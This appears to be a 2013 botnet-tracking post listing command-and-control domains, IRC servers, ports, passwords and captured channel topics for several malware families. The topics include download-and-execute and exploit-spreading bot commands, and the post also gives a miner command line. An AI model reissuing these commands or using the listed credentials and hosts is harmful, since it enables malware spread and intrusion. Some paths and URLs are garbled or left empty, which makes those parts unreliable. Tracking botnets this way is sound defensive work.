x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)

Resolved x01bkr2.biz to, Server:  x01bkr2.biz Port:  4723 Channel:  #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/ Hosting infos: http://whois.domaintools.com/ EDIT: snk is now desperately hosted in United States Scranton Volumedrive)

Panel:hxxp:// Plugins: hxxp:// hxxp:// hxxp:// Andromeda path need user and login :hxxp:// Other: sample:hxxp:// hosting infos: http://whois.domaintools.com/ (Irc botnet hosted by edis.at)

Server: Port:  443 Channel:  #test5 Channel password:  :godlol Topic for #test5 is: hacked by team whitehats Topic for #test5 set by Sabu at Tue Apr 23 15:14:29 2013 Example bot nick:  zwin-JJNEXJ|1952| Opers:  [Sabu] (ryan@dildos): ryan[Sabu] @#test5 @#opers @##fuckstamp #chats [Sabu] irc1.molten-wow.com :mw_customer_ircd[Sabu] is a Network Administrator[Sabu] is available for help.[Sabu] sysop[Sabu] idle 16:59:16,

xlotxdxtorwfmvuzfuvtspel.com(zeroaccess hosted in United States San Antonio Rackspace Cloud Servers)

Domain used: xlotxdxtorwfmvuzfuvtspel.com C:WINDOWSsystem32rsaenh.dll systemroot C:RECYCLER C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004 C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004$e0da97a6dd053ef45a7e44d9077fa7d5 L U @ n ACPI#PNP0303#2&da1a3ff&0 d2cd4bfe C:RECYCLERS-1-5-18 C:RECYCLERS-1-5-18$e0da97a6dd053ef45a7e44d9077fa7d5 C:DOCUME~1UserLOCALS~1Temp1 (1).exe PIPEwkssvc C: sample here hosting infos: http://whois.domaintools.com/

moneybooster.info (Betabot http botnet hosted by leaseweb.com)

Resolved moneybooster.info to Server: moneybooster.info Gate file:  /bb/order.php Alternate domain:  teeniecamchat.com Bitcoin mining info:  pwr.exe” -a sha256 -o http://ukontseeme@live.com_13:12341234@pool.50btc.com:8332 -t 1 -T 83 -l yes Hosting infos: http://whois.domaintools.com/

ppppppp.rsmatcher.com (YABOT irc botnet hosted by China Shantou Shantou Tianyin Technology Co. Ltd)

Resolved ppppppp.rsmatcher.com to Server:  ppppppp.rsmatcher.com Port:  6971 Server password:  laorosr Channel:  #J Channel topic #J:  .asc -S|.hxxp|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -aChannel:  #dpi Channel topic #dpi:  !dl hxxp:// rsxjs.com